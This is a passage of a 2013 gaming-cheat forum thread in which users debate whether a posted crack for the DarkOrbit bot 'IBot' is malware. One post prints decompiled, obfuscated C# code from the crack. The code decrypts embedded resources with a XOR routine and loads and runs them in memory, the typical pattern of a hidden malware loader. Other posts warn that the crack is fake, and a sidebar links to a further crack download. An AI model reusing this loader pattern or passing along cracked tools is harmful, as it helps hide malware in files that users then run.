|
You last visited: Today at 14:33
Advertisement
[CRACK] IBot 5.32 Cracked Version!
Discussion on [CRACK] IBot 5.32 Cracked Version! within the DarkOrbit forum part of the Browsergames category.
06/29/2013, 22:22
|
#46
|
elite*gold: 0
Join Date: Apr 2012
Posts: 227
Received Thanks: 65
|
the only one working crack of ibot is the kbot so:
#closerequest
|
|
|
06/29/2013, 22:24
|
#47
|
elite*gold: 0
Join Date: May 2012
Posts: 1,091
Received Thanks: 834
|
Mediafire has an inside virus scanner, so i don't think is virus...
|
|
|
06/29/2013, 22:26
|
#48
|
elite*gold: 0
Join Date: Apr 2012
Posts: 227
Received Thanks: 65
|
Quote:
Originally Posted by tauvens21
Did you try to run it as Administrator ? Because it needs administrator rights to inject into Ibot process.
i'm not trying to convince you or anything. Just don't say anything before you haven't tested it, ok ?
|
Yea, let it run as an admin and fu** up your system, right away.
|
|
|
06/29/2013, 22:26
|
#49
|
elite*gold: 0
Join Date: May 2012
Posts: 1,091
Received Thanks: 834
|
VT that i saw downhere says 0/45, but we all know that is possible to post fake VT.... anyway, i will wait your test before i test it (Last time i did it with pilotbot my account got hacked LOL)
|
|
|
06/29/2013, 22:29
|
#50
|
elite*gold: 0
Join Date: Apr 2012
Posts: 227
Received Thanks: 65
|
Quote:
Originally Posted by Madatek
VT that i saw downhere says 0/45, but we all know that is possible to post fake VT.... anyway, i will wait your test before i test it (Last time i did it with pilotbot my account got hacked LOL)
|
well, then you know that it`s better not to trust such a thingie.
|
|
|
06/29/2013, 22:31
|
#51
|
elite*gold: 0
Join Date: May 2012
Posts: 1,091
Received Thanks: 834
|
The fact is, he is not hiding, and mediafire has an insiìde virus scanner... so i don't know... and my curiosity is high... (i will still not download it anyway)
|
|
|
06/29/2013, 22:31
|
#52
|
elite*gold: 0
Join Date: Dec 2011
Posts: 3,252
Received Thanks: 2,240
|
I tested it, it worked, but I still have trial. When my trial is over I will test if it's really a "crack".
|
|
|
06/29/2013, 22:33
|
#53
|
elite*gold: 0
Join Date: May 2012
Posts: 1,091
Received Thanks: 834
|
Quote:
Originally Posted by melikhan
I tested it, it worked, but I still have trial. When my trial is over I will test if it's really a "crack". 
|
We will wait for you, mate 
If this works, it couldn't be posted anyway, since CRAKS AND WAREZ ARE NOT ALLOWED LOL!
Destiny's irony, isn't it?
|
|
|
06/29/2013, 22:40
|
#54
|
elite*gold: 0
Join Date: Apr 2012
Posts: 227
Received Thanks: 65
|
To put it in the another way: i wouldn not trust it! Come on  guy with 13 posts calls himself a C developer btw account created a month ago - LOL. NOT TRUSTED in any way. We all know that if someone here is developivg something, whether it`s new bot or whatever, it`s posted here in this forum some quite time before launch so... the answer comes in itself.
|
|
|
06/29/2013, 22:43
|
#55
|
elite*gold: 0
Join Date: Dec 2012
Posts: 235
Received Thanks: 123
|
Here is the decompiled Source code of this crack:
Code:
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Reflection.Emit;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace PtuuURMnaSfhMFUcpXEtGLRGorw
{
internal class OrTvrhNMwgrlktIrORnjqDcF
{
public delegate object LTlqLexrCljETyIIhZiGExwwbe(byte[] TjRLPOefNaUlBtsiIYmtRfbIcsxMNWoP, object[] leIjaUonStgMnhMKOoXnkanHJhVPR, string qlFGOPkxhDwFykuuoKlCxhQauL, string AarxZWADtGhTwZQGUpebCMNsLcPTJUeK);
public static string YjWpEXixhAnHqobhaukQjnn = "KEIpwCcHuAXEnuyXsEsdLmkxFEWxaXMck";
public static OrTvrhNMwgrlktIrORnjqDcF.LTlqLexrCljETyIIhZiGExwwbe hZttSjuJqRabRnaMjaQknKeSUHTbnM()
{
DynamicMethod dynamicMethod = new DynamicMethod("YKQSUdxSIWdadIbcpEkgbBvmqbLY", typeof(object), new Type[]
{
typeof(byte[]),
typeof(object[]),
typeof(string),
typeof(string)
});
ILGenerator iLGenerator = dynamicMethod.GetILGenerator();
System.Reflection.Emit.Label label = iLGenerator.DefineLabel();
iLGenerator.DeclareLocal(typeof(Assembly));
iLGenerator.Emit(OpCodes.Ldarg_0);
iLGenerator.EmitCall(OpCodes.Call, typeof(Assembly).GetMethod("Load", new Type[]
{
typeof(byte[])
}), null);
iLGenerator.Emit(OpCodes.Stloc_0);
iLGenerator.Emit(OpCodes.Ldarg_2);
iLGenerator.Emit(OpCodes.Brfalse_S, label);
iLGenerator.Emit(OpCodes.Ldarg_3);
iLGenerator.Emit(OpCodes.Brfalse_S, label);
iLGenerator.Emit(OpCodes.Ldloc_0);
iLGenerator.Emit(OpCodes.Ldarg_2);
iLGenerator.EmitCall(OpCodes.Callvirt, typeof(Assembly).GetMethod("GetType", new Type[]
{
typeof(string)
}), null);
iLGenerator.Emit(OpCodes.Ldarg_3);
iLGenerator.EmitCall(OpCodes.Callvirt, typeof(Type).GetMethod("GetMethod", new Type[]
{
typeof(string)
}), null);
iLGenerator.Emit(OpCodes.Ldnull);
iLGenerator.Emit(OpCodes.Ldarg_1);
iLGenerator.EmitCall(OpCodes.Callvirt, typeof(MethodBase).GetMethod("Invoke", new Type[]
{
typeof(object),
typeof(object[])
}), null);
iLGenerator.Emit(OpCodes.Ret);
iLGenerator.MarkLabel(label);
iLGenerator.Emit(OpCodes.Ldloc_0);
iLGenerator.EmitCall(OpCodes.Callvirt, typeof(Assembly).GetProperty("EntryPoint").GetGetMethod(), null);
iLGenerator.Emit(OpCodes.Ldnull);
iLGenerator.Emit(OpCodes.Ldarg_1);
iLGenerator.EmitCall(OpCodes.Callvirt, typeof(MethodBase).GetMethod("Invoke", new Type[]
{
typeof(object),
typeof(object[])
}), null);
iLGenerator.Emit(OpCodes.Ret);
return (OrTvrhNMwgrlktIrORnjqDcF.LTlqLexrCljETyIIhZiGExwwbe)dynamicMethod.CreateDelegate(typeof(OrTvrhNMwgrlktIrORnjqDcF.LTlqLexrCljETyIIhZiGExwwbe));
}
public static void Main()
{
if (File.Exists("IBot.exe"))
{
Process.Start("IBot.exe");
}
else
{
MessageBox.Show("IBot.exe not found", "ERROR");
}
bool flag = false;
OrTvrhNMwgrlktIrORnjqDcF.LTlqLexrCljETyIIhZiGExwwbe lTlqLexrCljETyIIhZiGExwwbe = OrTvrhNMwgrlktIrORnjqDcF.hZttSjuJqRabRnaMjaQknKeSUHTbnM();
byte[] tjRLPOefNaUlBtsiIYmtRfbIcsxMNWoP = OrTvrhNMwgrlktIrORnjqDcF.FgsololaAJnSxgcAakibKKfHbT("mPjSjVVhDxVRelNgIXgXDZKfwwaxyJSImVhRCOKbBLCHAfCsEh");
byte[] tjRLPOefNaUlBtsiIYmtRfbIcsxMNWoP2 = TJDpNWVbHNPjTJYWRXwHwsNvsDMEcnGbU.TRPpTpjsUbHTawmtnQupyZvHvK((byte[])lTlqLexrCljETyIIhZiGExwwbe(tjRLPOefNaUlBtsiIYmtRfbIcsxMNWoP, new object[0], "DeFcNFDVluXhsfMeIEvdsMFWrWCfQtgsRoPcgrTMxsYgc.IbmAsnIDapYikpDWErNdQEQjwQjjeynYsOOZsPBrjNNYDxHd", "bngSyMEKCCcEYXbCAoWbcdnqUsCqrfyIGaDLHFtCJ"), OrTvrhNMwgrlktIrORnjqDcF.YjWpEXixhAnHqobhaukQjnn);
byte[] array = TJDpNWVbHNPjTJYWRXwHwsNvsDMEcnGbU.TRPpTpjsUbHTawmtnQupyZvHvK((byte[])lTlqLexrCljETyIIhZiGExwwbe(tjRLPOefNaUlBtsiIYmtRfbIcsxMNWoP, new object[0], "DeFcNFDVluXhsfMeIEvdsMFWrWCfQtgsRoPcgrTMxsYgc.IbmAsnIDapYikpDWErNdQEQjwQjjeynYsOOZsPBrjNNYDxHd", "dfXmuTeNDtdGnVLYjBAFkVeJYuSgJcT"), OrTvrhNMwgrlktIrORnjqDcF.YjWpEXixhAnHqobhaukQjnn);
try
{
lTlqLexrCljETyIIhZiGExwwbe(array, new object[0], null, null);
flag = true;
}
catch (TargetParameterCountException)
{
lTlqLexrCljETyIIhZiGExwwbe(array, new object[]
{
new string[0]
}, null, null);
flag = true;
}
catch (Exception)
{
flag = false;
}
if (!flag)
{
lTlqLexrCljETyIIhZiGExwwbe(tjRLPOefNaUlBtsiIYmtRfbIcsxMNWoP2, new object[]
{
array,
Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), (string)lTlqLexrCljETyIIhZiGExwwbe(tjRLPOefNaUlBtsiIYmtRfbIcsxMNWoP2, new object[0], "XOLJUAhLYnVwdhrgNGijWaHXveRsxAqLWTrwgCY.vIrmcFFmaQNcvtfvGnMphnNYvJZKouyLgRnOhTtqYeSg", "gvdOxFIyNAwExkbvNmgRbWTJks")),
false
}, "XOLJUAhLYnVwdhrgNGijWaHXveRsxAqLWTrwgCY.vIrmcFFmaQNcvtfvGnMphnNYvJZKouyLgRnOhTtqYeSg", "OObmupspiiHuTpSeuweQCueGRNmtUQDVglhuwWsFGVxhfSOcaMd");
}
}
public static byte[] FgsololaAJnSxgcAakibKKfHbT(string name)
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
byte[] array = new byte[manifestResourceStream.Length];
manifestResourceStream.Read(array, 0, array.Length);
return array;
}
}
}
Code:
using System;
using System.Text;
namespace PtuuURMnaSfhMFUcpXEtGLRGorw
{
public class TJDpNWVbHNPjTJYWRXwHwsNvsDMEcnGbU
{
public static byte[] TRPpTpjsUbHTawmtnQupyZvHvK(byte[] RxTHnPEoHHbEHXDXknZcPQhy, string gdPtUIsIgRtBTTDVHfmMMnRvCKSWgsA)
{
byte[] bytes = Encoding.ASCII.GetBytes(gdPtUIsIgRtBTTDVHfmMMnRvCKSWgsA);
for (int i = 0; i <= RxTHnPEoHHbEHXDXknZcPQhy.Length; i++)
{
int num = (int)(RxTHnPEoHHbEHXDXknZcPQhy[i % RxTHnPEoHHbEHXDXknZcPQhy.Length] ^ bytes[i % bytes.Length]);
int num2 = (int)RxTHnPEoHHbEHXDXknZcPQhy[(i + 1) % RxTHnPEoHHbEHXDXknZcPQhy.Length];
RxTHnPEoHHbEHXDXknZcPQhy[i % RxTHnPEoHHbEHXDXknZcPQhy.Length] = (byte)((num - num2 + 256) % 256);
}
Array.Resize<byte>(ref RxTHnPEoHHbEHXDXknZcPQhy, RxTHnPEoHHbEHXDXknZcPQhy.Length - 1);
return RxTHnPEoHHbEHXDXknZcPQhy;
}
}
}
Now everyone could choise if he want to run this
EDIT: I will not judge or evaluate
|
|
|
06/29/2013, 22:48
|
#56
|
elite*gold: 0
Join Date: Apr 2012
Posts: 227
Received Thanks: 65
|
Andrej, just tell us what`s in this code instead of posting a source as long as you are trusted one....Not all here in this forum know as much as You do about coding and reading the source files code.
|
|
|
06/29/2013, 23:13
|
#57
|
elite*gold: 3570
Join Date: Dec 2012
Posts: 13,044
Received Thanks: 8,252
|
I'll decompile it myself and say if it's real or not
|
|
|
06/29/2013, 23:15
|
#58
|
elite*gold: 0
Join Date: Apr 2013
Posts: 3
Received Thanks: 0
|
does not work
|
|
|
06/29/2013, 23:23
|
#59
|
elite*gold: 0
Join Date: Jun 2013
Posts: 18
Received Thanks: 1
|
does not work
use it in Win 7 ultimate x64 as Admin
|
|
|
06/29/2013, 23:28
|
#60
|
elite*gold: 3570
Join Date: Dec 2012
Posts: 13,044
Received Thanks: 8,252
|
It's fake. So please don't run it. Or even download it.
|
|
|
Similar Threads
|
Ibot Crack for new version
07/14/2012 - DarkOrbit - 27 Replies
Hi, i have found the new crack for the new version of ibot in cheatgam3 : a french site .
download it : https://rapidshare.com/files/2939271801/IbotCrack. rar
juste run IbotCrack and make a patch and run wp669 .
VirusTotal : 404 not found ??? Sorry
|
All times are GMT +1. The time now is 14:33.
|
|